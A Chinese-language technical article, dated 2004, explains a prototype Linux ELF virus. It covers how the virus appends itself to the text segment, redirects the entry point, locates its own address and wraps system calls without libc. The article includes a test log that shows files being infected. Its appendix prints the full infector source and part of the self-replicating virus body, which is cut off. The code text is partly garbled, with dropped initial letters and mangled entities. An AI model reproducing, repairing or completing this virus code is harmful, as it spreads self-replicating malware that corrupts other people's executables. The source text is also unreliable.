一、 ** 介绍
写这篇文章的目的主要是对最近写的一个Linux病毒原型代码做一个总结,
同时向对这方面有兴趣的朋友做一个简单的介绍。
阅读这篇文章你需要一些知识,要对ELF有所了解、能够阅读一些嵌入
了汇编的C代码、了解病毒的基本工作原理。
二、 ** ELF Infector (ELF文件感染器)
为了制作病毒文件,我们需要一个ELF文件感染器,用于制造第一个带毒文件。
对于ELF文件感染技术,在Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》
一文中已经有了一个非常好的分析、描述,在这方面我还没有发现可以对其进行补充的
地方,因此在这里我把Silvio Cesare对ELF Infection过程的总结贴出来,以供参考:
The final algorithm is using this information is.
* Increase p_shoff by PAGE_SIZE in the ELF header
* Patch the insertion code (parasite) to jump to the entry point
(original)
* Locate the text segment program header
* Modify the entry point of the ELF header to point to the new
code (p_vaddr + p_filesz)
* Increase p_filesz by account for the new code (parasite)
* Increase p_memsz to account for the new code (parasite)
* For each phdr who's segment is after the insertion (text segment)
* increase p_offset by PAGE_SIZE
* For the last shdr in the text segment
* increase sh_len by the parasite length
* For each shdr who's section resides after the insertion
* Increase sh_offset by PAGE_SIZE
* Physically insert the new code (parasite) and pad to PAGE_SIZE, into
the file - text segment p_offset + p_filesz (original)
在Linux病毒原型中所使用的gei - ELF Infector即是根据这个原理写的。在
附录中你可以看到这个感染工具的源代码: g-elf-infector.c
g-elf-infector与病毒是独立开的,其只在制作第一个病毒文件时被使用。我简单介
绍一下它的使用方法,g-elf-infector.c可以被用于任何希望--将二进制代码插入到
指定文件的文本段,并在目标文件执行时首先被执行--的用途上。g-elf-infector.c
的接口很简单,你只需要提供以下三个定义:
* 存放你的二进制代码返回地址的地址,这里需要的是这个地址与代码起始
地址的偏移,用于返回到目标程序的正常入口
#define PARACODE_RETADDR_ADDR_OFFSET 1232
* 要插入的二进制代码(由于用C编写,所以这里需要以一个函数的方式提供)
void parasite_code(void);
* 二进制代码的结束(为了易用,这里用一个结尾函数来进行代码长度计算)
void parasite_code_end(void);
arasite_code_end应该是parasite_code函数后的第一个函数定义,通常应该如下表示
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {}
在这里存在一个问题,就是编译有可能在编译时将parasite_code_end放在parasite_code
地址的前面,这样会导致计算代码长度时失败,为了避免这个问题,你可以这样做
void parasite_code(void)
{
...
...
...
}
void parasite_code_end(void) {parasite_code();}
有了这三个定义,g-elf-infector就能正确编译,编译后即可用来ELF文件感染
~grip2@linux> ./gei foo
三、** 病毒原型的工作过程
1 首先通过ELF Infector将病毒代码感染到一个ELF文件,这样就创造了第一
个带毒文件,后续的传播就由它来完成。
2 当带毒文件被执行时,会首先跳到病毒代码开始执行。
3 病毒代码开始发作,在这个原型里,病毒会直接开始传播。
4 病毒遍历当前目录下的每一个文件,如果是符合条件的ELF文件就开始感染。
5 病毒的感染过程和ELF Infector的过程类似,但由于工作环境的不同,
代码的实现也是有较大区别的。
6 目前传染对ELF文件的基本要求是文本段要有剩余空间能够容纳病毒代码,
如果无法满足,病毒会忽略此ELF。对于被感染过一次的ELF文件,文本段将不会有
剩余的空间,因此二次感染是不会发生的。
7 病毒代码执行过后,会恢复堆栈和所有寄存器(这很重要),然后跳回到
真正的可执行文件入口,开始正常的运行过程。
上面对病毒原型的工作过程的介绍也许显得千篇一律了,和我们早就熟知的
关于病毒的一些介绍没有什么区别?是的,的确是这样,原理都是类似的,关键是要看
实现。下面我们就将通过对一些技术问题的分析来了解具体的实现思路。
四、** 关键技术问题及处理
1 ELF文件执行流程重定向和代码插入
在ELF文件感染的问题上,ELF Infector与病毒传播时调用的infect_virus思路是一样的:
* 定位到文本段,将病毒的代码接到文本段的尾部。这个过程的关键是要熟悉
ELF文件的格式,将病毒代码复制到文本段尾部后,能够根据需要调整文本段长度改变
所影响到的后续段(segment)或节(section)的虚拟地址。同时注意把新引入的文本段部
分与一个.setion建立关联,防止strip这样的工具将插入的代码去除。还有一点就是要
注意文本段增加长度的对齐问题,见ELF文档中的描述:
_align
As ``Program Loading'' later in this part describes, loadable
rocess segments must have congruent values for p_vaddr and
_offset, modulo the page size.
* 通过过将ELF文件头中的入口地址修改为病毒代码地址来完成代码重定向:
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
2 病毒代码如何返回到真正的ELF文件入口
方法技巧应该很多,这里采用的方法是PUSH+RET组合:
__asm__ volatile (
...
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
其中0xAABBCCDD处存放的是真正的程序入口地址,这个值在插入病毒代码时由感染程
序来填写。
3 堆栈和寄存器的恢复
病毒代码必须保证运行前、后的堆栈和寄存器内容完全相同,这通过增加额外的代码
来完成。
在进入时:
__asm__ volatile (
"push %%eax\n\t"
"push %%ecx\n\t"
"push %%edx\n\t"
::);
退出时:
__asm__ volatile (
"popl %%edx\n\t"
"popl %%ecx\n\t"
"popl %%eax\n\t"
"addl $0x102c, %%esp\n\t"
"popl %%ebx\n\t"
"popl %%esi\n\t"
"popl %%edi\n\t"
"popl %%ebp\n\t"
"jmp return\n"
要注意上面的代码是根据特定的编译器、编译选项来调整的,在不同的环境下如果重
新编译病毒程序,可能还需要做一些调整。
4 字符串的使用
write(1, "hello world\n", 12);
在病毒代码中这样对一个字符串直接引用是不可以的。这是对字符串的使用是一个绝
对地址引用,病毒代码在进入到一个新的宿主内后,这一绝对地址的内容是无法得到
保证的,因此在病毒代码内应该使用相对地址或间接地址进行字符串访问。
下面是Silvio Cesare的《UNIX ELF PARASITES AND VIRUS》中的一个解决办法,利用
了缓冲区溢出中shellcode的编写技术:
In x86 Linux, some syscalls require the use of an absolute address pointing to
initialized data. This can be made relocatable by using a common trick used
in buffer overflow code.
jmp A
B:
op %eax ; %eax now has the address of the string
. ; continue as usual
.
.
A:
call B
.string \"hello\"
By making a call directly proceeding the string of interest, the address of
the string is pushed onto the stack as the return address.
但是在编写这个linux病毒原型代码时,我并没有使用这个方法,我尽力使代码使用
C语言的语法:
char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};
#ifndef NDEBUG
char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
's','u','p','p','o','r','t','e','d','\n','\0'};
char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif
在这里将字符串以字符数组的形式出现,编译之后的代码是这样:
...
movb $47, -8312(%ebp)
movb $116, -8311(%ebp)
movb $109, -8310(%ebp)
movb $112, -8309(%ebp)
movb $47, -8308(%ebp)
movb $46, -8307(%ebp)
movb $103, -8306(%ebp)
movb $118, -8305(%ebp)
movb $105, -8304(%ebp)
movb $114, -8303(%ebp)
movb $117, -8302(%ebp)
movb $115, -8301(%ebp)
...
这样带来一个负面影响就是增加了代码长度,但是适当的使用对代码长度影响并不大。
值得注意的一点是,当字符数组定义的尺寸超过了64时,在我的编译环境下,编译器
对代码进行了优化,会导致编译后代码成为:
...
.section .rodata
.LC0:
.byte 47
.byte 116
.byte 109
.byte 112
.byte 47
.byte 46
.byte 103
.byte 118
.byte 105
.byte 114
.byte 117
.byte 115
.byte 0
...
数据被放到了.rodata section中,这样就使得其无法随病毒代码一起进入宿主,会
造成访问失败,所以注意数组的申请尽量保持32以内,防止编译器优化。
除此之外,使用整型数组的方法也与此类似,不再赘述。
5 遭遇gcc-3.3的bug
gvirus.c中有一部分的数据初始化是这样的:
...
char curdir[2] = {'.', 0};
char newline = '\n';
curdir[0] = '.';
curdir[1] = 0;
ewline = '\n';
if ((curfd = g_open(curdir, O_RDONLY, 0)) < 0)
goto out;
...
也许你会奇怪,为什么curdir和newline在已经初始化后还要重新赋值,这其中的原因
是为了绕过一个gcc的bug。
在我的编译环境下,当只做
char curdir[2] = {'.', 0};
char newline = '\n';
这样的初始化时,反汇编代码如下:
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: lea 0x4e(%esp),%ebx <-- 使用curdir
0x08048cc3 <parasite_code+19>: mov $0x5,%eax
0x08048cc8 <parasite_code+24>: mov %ecx,%edx
0x08048cca <parasite_code+26>: int $0x80 <-- g_open系统调用
0x08048ccc <parasite_code+28>: mov %eax,0x38(%esp)
0x08048cd0 <parasite_code+32>: cmp $0xffffff82,%eax
0x08048cd3 <parasite_code+35>: jbe 0x8048cdd <parasite_code+45>
0x08048cd5 <parasite_code+37>: movl $0xffffffff,0x38(%esp)
0x08048cdd <parasite_code+45>: mov 0x38(%esp),%eax
0x08048ce1 <parasite_code+49>: test %eax,%eax
0x08048ce3 <parasite_code+51>: js 0x804915d <infect_start+1128>
0x08048ce9 <parasite_code+57>: movw $0x2e,0x4e(%esp) <-- curdir的初始化
...
从注释可以看出,在这种情况下,curdir的初始化被放到了g_open使用其做参数之后。
当加入
curdir[0] = '.';
curdir[1] = 0;
ewline = '\n';
后,反汇编代码如下:
...
0x08048cb0 <parasite_code+0>: push %ebp
0x08048cb1 <parasite_code+1>: push %edi
0x08048cb2 <parasite_code+2>: push %esi
0x08048cb3 <parasite_code+3>: push %ebx
0x08048cb4 <parasite_code+4>: sub $0x20bc,%esp
0x08048cba <parasite_code+10>: push %eax
0x08048cbb <parasite_code+11>: push %ecx
0x08048cbc <parasite_code+12>: push %edx
0x08048cbd <parasite_code+13>: xor %ecx,%ecx
0x08048cbf <parasite_code+15>: movw $0x2e,0x4e(%esp) <-- curdir的初始化
0x08048cc6 <parasite_code+22>: lea 0x4e(%esp),%ebx <-- 作为参数使用
0x08048cca <parasite_code+26>: mov $0x5,%eax
0x08048ccf <parasite_code+31>: mov %ecx,%edx
0x08048cd1 <parasite_code+33>: int $0x80 <-- g_open系统调用
...
从注释可以看出,加入了这段代码后,程序编译正确,避免了这个编译器bug。
6 通过C语言和inline保证病毒代码的可读性和可移植性
用汇编写病毒代码的一个缺点就是 - 可读性和可移植性差,这也是使用汇编语言写
程序的一个普遍的缺点。
在这个linux病毒原型代码了主体使用的都是C语言,只有极少部分由于C语言本身的
限制而不得不使用gcc嵌入汇编。对于C语言部分,也尽量是用inline函数,保证代码
层次分明,保证可读性。
7 病毒代码复制时如何获得自己的起始地址?
虽然,病毒代码部分向ELF Infector提供了代码的起始地址,保证了生成第一个带毒
文件时能够找到代码并插入到目标文件内。但是作为进入宿主内部的代码在进行传播
时却无法使用这个地址,因为它的代码位置已经受到了宿主的影响,这时它需要重新
定位自己的起始位置。
在写这个病毒原型时,我并没有参考过其它病毒的代码,因此这里采用的也许并
不是一个最好的方法:
/* Get start address of virus code */
__asm__ volatile (
"jmp get_start_addr\n"
"infect_start:\n\t"
"popl %0\n\t"
:"=m" (para_code_start_addr)
:);
ara_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;
... /* c代码 */
...
__asm__ volatile (
...
"get_start_addr:\n\t"
"call infect_start\n"
"return:\n\t"
"push $0xAABBCCDD\n\t" /* push ret_addr */
"ret\n"
::);
通过缓冲区溢出中的一个技巧,jmp/call组合来得到push $0xAABBCCDD指令的地址。
这个地址是0xAABBCCDD地址向后一个push指令,而0xAABBCCDD的地址就是那个用于
存放病毒代码返回地址的地址,这个地址相对于病毒代码起始地址的偏移我们是知道
的,就是病毒代码函数向ELF Infector接口提供的那个宏定义的值:
#ifndef NDEBUG
#define PARACODE_RETADDR_ADDR_OFFSET 1704
#else
#define PARACODE_RETADDR_ADDR_OFFSET 1232
#endif
这样病毒代码在当前宿主中的位置就可以得到了(注意从汇编指令出来后,
ara_code_start_addr中存放的是0xAABBCCDD的地址,我们减去偏移再减
一个push指令的长度,就是病毒代码的起始地址):
ara_code_start_addr -= PARACODE_RETADDR_ADDR_OFFSET - 1;
8 抛弃C库
由于病毒代码要能在不同的ELF文件内容工作,所以我们必须要保证所有的相关函数
调用在病毒体内即可完成。而对C库的使用将使我们很难做到这一点,即使有的C库函
数是可以完全内联的(完全内联就是说,这个函数本身可以内联,同时其内部没有向
外的函数调用),但是随着编译环境的不同,这点也是不能得到根本保证的,因此我
们有必要选择抛弃C库。
没有了C库,我们使用到的一些函数调用就必须重新实现。在这个Linux病毒原型中有
两种情况,一种是系统调用,另一种是普通的函数。
对于系统调用,我们采用了重新包装的方法:
tatic inline
g_syscall3(int, write, int, fd, const void *, buf, off_t, count);
tatic inline
g_syscall3(int, getdents, uint, fd, struct dirent *, dirp, uint, count);
tatic inline
g_syscall3(int, open, const char *, file, int, flag, int, mode);
tatic inline
g_syscall1(int, close, int, fd);
tatic inline
g_syscall6(void *, mmap2, void *, addr, size_t, len, int, prot,
int, flags, int, fd, off_t, offset);
tatic inline
g_syscall2(int, munmap, void *, addr, size_t, len);
tatic inline
g_syscall2(int, rename, const char *, oldpath, const char *, newpath);
tatic inline
g_syscall2(int, fstat, int, filedes, struct stat *, buf);
并且修改了syscall包装的宏定义,如
#define g__syscall_return(type, res) \
do { \
if ((unsigned long)(res) >= (unsigned long)(-125)) { \
res = -1; \
} \
return (type) (res); \
} while (0)
#define g_syscall0(type,name) \
type g_##name(void) \
{ \
long __res; \
__asm__ volatile ("int $0x80" \
: "=a" (__res) \
: "0" (__NR_##name)); \
g__syscall_return(type,__res); \
}
对于普通的函数,直接复制一份函数定义:
tatic inline void * __memcpy(void * to, const void * from, size_t n)
{
int d0, d1, d2;
__asm__ __volatile__(
"rep ; movsl\n\t"
"testb $2,%b4\n\t"
"je 1f\n\t"
"movsw\n"
"1:\ttestb $1,%b4\n\t"
"je 2f\n\t"
"movsb\n"
"2:"
: "=&c" (d0), "=&D" (d1), "=&S" (d2)
:"0" (n/4), "q" (n),"1" ((long) to),"2" ((long) from)
: "memory");
return (to);
}
9 保证病毒代码的瘦身需要
为了保证病毒代码体积不至于过于庞大,影响病毒代码的感染,编写代码时也要注意
代码体积问题。由于采用C代码的方式,一些函数调用都是内联的方式,因此每多一个
调用都会引起代码体积的增加。
在进行ELF文件读写更是如此,read/write被频繁的调用。为了减小这方面的影响,对
目标ELF文件进行了一个mmap处理,这样地址空间直接被映射到文件,就消除了读目标
文件时所要做的read调用,节省了一些空间:
ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED) {
goto err;
}
/* Check ELF magic-ident */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
goto err;
}
当前的代码都是用C编写,这样很难象汇编代码那样进行更高程度的精简,不过目前的
代码体积还在合理的范围,
在调试状态和标准状态分别是1744和1248
#ifndef NDEBUG
#define PARACODE_LENGTH 1744
#else
#define PARACODE_LENGTH 1248
#endif
10 数据结构的不一致
与C库的代码调用类似,我们使用的头文件中有一些数据类型的定义是经过
包装的,与系统调用中使用的并不相同。代码相关的两个数据结构,单独提取了出来。
truct dirent {
long d_ino;
unsigned long d_off;
unsigned short d_reclen;
char d_name[256]; /* We must not include limits.h! */
};
truct stat {
unsigned long st_dev;
unsigned long st_ino;
unsigned short st_mode;
unsigned short st_nlink;
unsigned short st_uid;
unsigned short st_gid;
unsigned long st_rdev;
unsigned long st_size;
unsigned long st_blksize;
unsigned long st_blocks;
unsigned long st_atime;
unsigned long st_atime_nsec;
unsigned long st_mtime;
unsigned long st_mtime_nsec;
unsigned long st_ctime;
unsigned long st_ctime_nsec;
unsigned long __unused4;
unsigned long __unused5;
};
五、** 在一个新的编译环境下的调试方法
grip2@linux:~/tmp/virus> ls
g-elf-infector.c gsyscall.h gunistd.h gvirus.c gvirus.h foo.c Makefile parasite-sample.c parasite-sample.h
调整Makefile文件,将编译模式改为调试模式,即关掉-DNDEBUG选项
grip2@linux:~/tmp/virus> cat Makefile
all: foo gei
gei: g-elf-infector.c gvirus.o
gcc -O2 $< gvirus.o -o gei -Wall #-DNDEBUG
foo: foo.c
gcc $< -o foo
gvirus.o: gvirus.c
gcc $< -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
clean:
rm *.o -rf
rm foo -rf
rm gei -rf
编译代码
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
先获取病毒代码长度,然后调整gvirus.c中的#define PARACODE_LENGTH定义
grip2@linux:~/tmp/virus> ./gei -l <-- 这里获取病毒代码的长度
Parasite code length: 1744
获取病毒代码开始位置和0xaabbccdd的地址,计算存放返回地址的地址的偏移
grip2@linux:~/tmp/virus> objdump -d gei|grep aabbccdd
8049427: 68 dd cc bb aa push $0xaabbccdd
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>"
08048d80 <parasite_code>:
8049450: e9 2b f9 ff ff jmp 8048d80 <parasite_code>
grip2@linux:~/tmp/virus> objdump -d gei|grep "<parasite_code>:"
08048d80 <parasite_code>:
0x8049427与0x8048d80相减即获得我们需要的偏移,
用这个值更新gvirus.h中的#define PARACODE_RETADDR_ADDR_OFFSET宏的值
重新编译
grip2@linux:~/tmp/virus> make clean
rm *.o -rf
rm foo -rf
rm gei -rf
grip2@linux:~/tmp/virus> make
gcc foo.c -o foo
gcc gvirus.c -O2 -c -o gvirus.o -fomit-frame-pointer -Wall #-DNDEBUG
gcc -O2 g-elf-infector.c gvirus.o -o gei -Wall #-DNDEBUG
grip2@linux:~/tmp/virus> ls
gei gsyscall.h gvirus.c gvirus.o foo.c parasite-sample.c
g-elf-infector.c gunistd.h gvirus.h foo Makefile parasite-sample.h
建立一个测试目录,测试一下
grip2@linux:~/tmp/virus> mkdir test
grip2@linux:~/tmp/virus> cp gei foo test
grip2@linux:~/tmp/virus> cd test
grip2@linux:~/tmp/virus/test> ls
gei foo
grip2@linux:~/tmp/virus/test> cp foo h
制作带毒程序
grip2@linux:~/tmp/virus/test> ./gei h
file size: 8668
e_phoff: 00000034
e_shoff: 00001134
e_phentsize: 00000020
e_phnum: 00000008
e_shentsize: 00000028
e_shnum: 00000025
text segment file offset: 0
[15 sections patched]
grip2@linux:~/tmp/virus/test> ll
total 44
-rwxr-xr-x 1 grip2 users 14211 2004-12-13 07:50 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:50 foo
运行带毒程序
grip2@linux:~/tmp/virus/test> ./h
.
..
gei
foo
h
.backup.h
real elf point
grip2@linux:~/tmp/virus/test> ll
total 52
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
测试上面带毒程序运行后,是否感染了其他ELF程序
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
real elf point
OK,成功
grip2@linux:~/tmp/virus/test> cp ../foo hh
grip2@linux:~/tmp/virus/test> ll
total 64
-rwxr-xr-x 1 grip2 users 18307 2004-12-13 07:51 gei
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 h
-rwxr-xr-x 1 grip2 users 8668 2004-12-13 07:51 hh
-rwxr-xr-x 1 grip2 users 12764 2004-12-13 07:51 foo
grip2@linux:~/tmp/virus/test> ./foo
.
..
gei
Better luck next file
foo
h
Better luck next file
.backup.h
Better luck next file
hh
real elf point
grip2@linux:~/tmp/virus/test>
六、** 最后
由于我既不是一个virus coder也不是一个anti-virus coder,所以对病毒
技术的掌握应该是有欠缺的。如果在文章中对病毒技术的描述不够准确,分析不够到
位,还请指正,谢谢。
七、** 参考文献
1 Silvio Cesare 的《UNIX ELF PARASITES AND VIRUS》
2 ELF文档
3 更多的安全技术交流
http://www.linuxforum.net/forum/showflat.php?Cat=&Board=security&
Number=479955&page=0&view=collapsed&sb=5&o=31&fpart=
八、** 附录 - ELF文件感染工具和病毒原型源代码
------------------------------ g-elf_infector.c ------------------------------
/*
* gei - ELF Infector v0.0.2 (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include <elf.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include "gvirus.h"
#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
tatic int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset);
int main(int argc, char *argv[])
{
#define MAX_FILENAME_LEN 256
char backup[MAX_FILENAME_LEN*4];
char restore[MAX_FILENAME_LEN*4];
if (argc != 2) {
fprintf(stderr,
"gei - ELF Infector v0.0.2 written by grip2 <gript2@hotmail.com>\n");
fprintf(stderr, "Usage: %s <elf-exec-file>\n", argv[0]);
return 1;
}
if (strcmp(argv[1], "-l") == 0) {
fprintf(stderr, "Parasite code length: %d\n",
amp;parasite_code_end - ¶site_code);
return 1;
}
if (strlen(argv[1]) > MAX_FILENAME_LEN) {
fprintf(stderr, "filename too long!\n");
return 1;
}
rintf(backup, "cp -f %s .backup.%s\n", argv[1], argv[1]);
rintf(restore, "cp -f .backup.%s %s\n", argv[1], argv[1]);
ystem(backup);
if (elf_infect(argv[1], ¶site_code,
amp;parasite_code_end - ¶site_code,
PARACODE_RETADDR_ADDR_OFFSET) < 0) {
ystem(restore);
return 1;
}
return 0;
}
tatic int elf_infect(const char *filename,
void *para_code,
unsigned int para_code_size,
unsigned long retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
Elf32_Ehdr *ehdr = NULL;
Elf32_Phdr *phdr;
Elf32_Shdr *shdr;
int i;
int txt_index;
truct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_para_code[PAGE_SIZE];
char *tmpfile;
tmpfile = tempnam(NULL, "infector");
fd = open(filename, O_RDWR);
if (fd == -1) {
error(filename);
goto err;
}
if (fstat(fd, &stat) == -1) {
error("fstat");
goto err;
}
#ifndef NDEBUG
rintf("file size: %lu\n", stat.st_size);
#endif
ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED) {
error("mmap ehdr");
goto err;
}
/* Check ELF magic-ident */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
fprintf(stderr, "File type not supported\n");
goto err;
}
#ifndef NDEBUG
rintf("e_phoff: %08x\ne_shoff: %08x\n",
ehdr->e_phoff, ehdr->e_shoff);
rintf("e_phentsize: %08x\n", ehdr->e_phentsize);
rintf("e_phnum: %08x\n", ehdr->e_phnum);
rintf("e_shentsize: %08x\n", ehdr->e_shentsize);
rintf("e_shnum: %08x\n", ehdr->e_shnum);
#endif
align_code_size = PAGE_ALIGN(para_code_size);
/* Get program header and section header start address */
hdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
hdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
/* Locate the text segment */
txt_index = 0;
while (1) {
if (txt_index == ehdr->e_phnum - 1) {
fprintf(stderr, "Invalid e_phnum, text segment not found.\n");
goto err;
}
if (phdr[txt_index].p_type == PT_LOAD
amp;& phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */
#ifndef NDEBUG
rintf("text segment file offset: %u\n", phdr[txt_index].p_offset);
#endif
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size
gt; phdr[txt_index+1].p_vaddr) {
fprintf(stderr, "Better luck next file :-)\n");
goto err;
}
reak;
}
txt_index++;
}
/* Modify the entry point of the ELF */
org_entry = ehdr->e_entry;
ehdr->e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz;
ew_code_pos =
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz;
/* Increase the p_filesz and p_memsz of text segment
* for new code */
hdr[txt_index].p_filesz += align_code_size;
hdr[txt_index].p_memsz += align_code_size;
for (i = 0; i < ehdr->e_phnum; i++)
if (phdr[i].p_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr)
hdr[i].p_offset += align_code_size;
tmp_flag = 0;
for (i = 0; i < ehdr->e_shnum; i++) {
if (shdr[i].sh_offset >= (unsigned long) new_code_pos - (unsigned long) ehdr) {
hdr[i].sh_offset += align_code_size;
if (!tmp_flag && i) { /* associating the new_code to the last
* section in the text segment */
hdr[i-1].sh_size += align_code_size;
tmp_flag = 1;
rintf("[%d sections patched]\n", i-1);
}
}
}
/* Increase p_shoff in the ELF header */
ehdr->e_shoff += align_code_size;
/* Make a new file */
tmp_fd = open(tmpfile, O_WRONLY|O_CREAT, stat.st_mode);
if (tmp_fd == -1) {
error("open");
goto err;
}
ize = new_code_pos - (void *) ehdr;
if (write(tmp_fd, ehdr, size) != size) {
error("write");
goto err;
}
memcpy(tmp_para_code, para_code, para_code_size);
memcpy(tmp_para_code + retaddr_addr_offset,
amp;org_entry, sizeof(org_entry));
if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) {
error("write");
goto err;
}
if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size)
!= stat.st_size - size) {
error("write");
goto err;
}
close(tmp_fd);
munmap(ehdr, stat.st_size);
close(fd);
if (rename(tmpfile, filename) == -1) {
error("rename");
goto err;
}
return 0;
err:
if (tmp_fd != -1)
close(tmp_fd);
if (ehdr)
munmap(ehdr, stat.st_size);
if (fd != -1)
close(fd);
return -1;
}
------------------------------ g-elf_infector.c ------------------------------
------------------------------ gvirus.h ------------------------------
#ifndef _G2_PARASITE_CODE_
#define _G2_PARASITE_CODE_
#ifndef NDEBUG
#define PARACODE_RETADDR_ADDR_OFFSET 1704
#else
#define PARACODE_RETADDR_ADDR_OFFSET 1232
#endif
void parasite_code(void);
void parasite_code_end(void);
#endif
------------------------------ gvirus.h ------------------------------
------------------------------ gvirus.c ------------------------------
/*
* virus code in C (2004)
* written by grip2 <gript2@hotmail.com>
*/
#include "gsyscall.h"
#include "gvirus.h"
#include <elf.h>
#define PAGE_SIZE 4096
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1))
#ifndef NDEBUG
#define PARACODE_LENGTH 1744
#else
#define PARACODE_LENGTH 1248
#endif
#ifndef NDEBUG
#define V_DEBUG_WRITE(...) \
do {\
g_write(__VA_ARGS__);\
} while(0)
#else
#define V_DEBUG_WRITE(...)
#endif
tatic inline int infect_virus(
const char *file,
void *v_code,
unsigned int v_code_size,
unsigned long v_retaddr_addr_offset)
{
int fd = -1;
int tmp_fd = -1;
Elf32_Ehdr *ehdr = NULL;
Elf32_Phdr *phdr;
Elf32_Shdr *shdr;
int i;
int txt_index;
truct stat stat;
int align_code_size;
unsigned long org_entry;
void *new_code_pos;
int tmp_flag;
int size;
unsigned char tmp_v_code[PAGE_SIZE];
char tmpfile[32] = {'/','t','m','p','/','.','g','v','i','r','u','s','\0'};
#ifndef NDEBUG
char err_type[32] = {'f','i','l','e',' ','t','y','p','e',' ','n','o','t',' ',
's','u','p','p','o','r','t','e','d','\n','\0'};
char luck[32] = {'B','e','t','t','e','r',' ','l','u','c','k',' ',
'n','e','x','t',' ','f','i','l','e','\n','\0'};
#endif
fd = g_open(file, O_RDWR, 0);
if (fd == -1) {
goto err;
}
if (g_fstat(fd, &stat) == -1) {
goto err;
}
ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0);
if (ehdr == MAP_FAILED) {
goto err;
}
/* Check ELF magic-ident */
if (ehdr->e_ident[EI_MAG0] != 0x7f
|| ehdr->e_ident[EI_MAG1] != 'E'
|| ehdr->e_ident[EI_MAG2] != 'L'
|| ehdr->e_ident[EI_MAG3] != 'F'
|| ehdr->e_ident[EI_CLASS] != ELFCLASS32
|| ehdr->e_ident[EI_DATA] != ELFDATA2LSB
|| ehdr->e_ident[EI_VERSION] != EV_CURRENT
|| ehdr->e_type != ET_EXEC
|| ehdr->e_machine != EM_386
|| ehdr->e_version != EV_CURRENT
) {
V_DEBUG_WRITE(1, &err_type, sizeof(err_type));
goto err;
}
align_code_size = PAGE_ALIGN(v_code_size);
/* Get program header and section header start address */
hdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr->e_phoff);
hdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr->e_shoff);
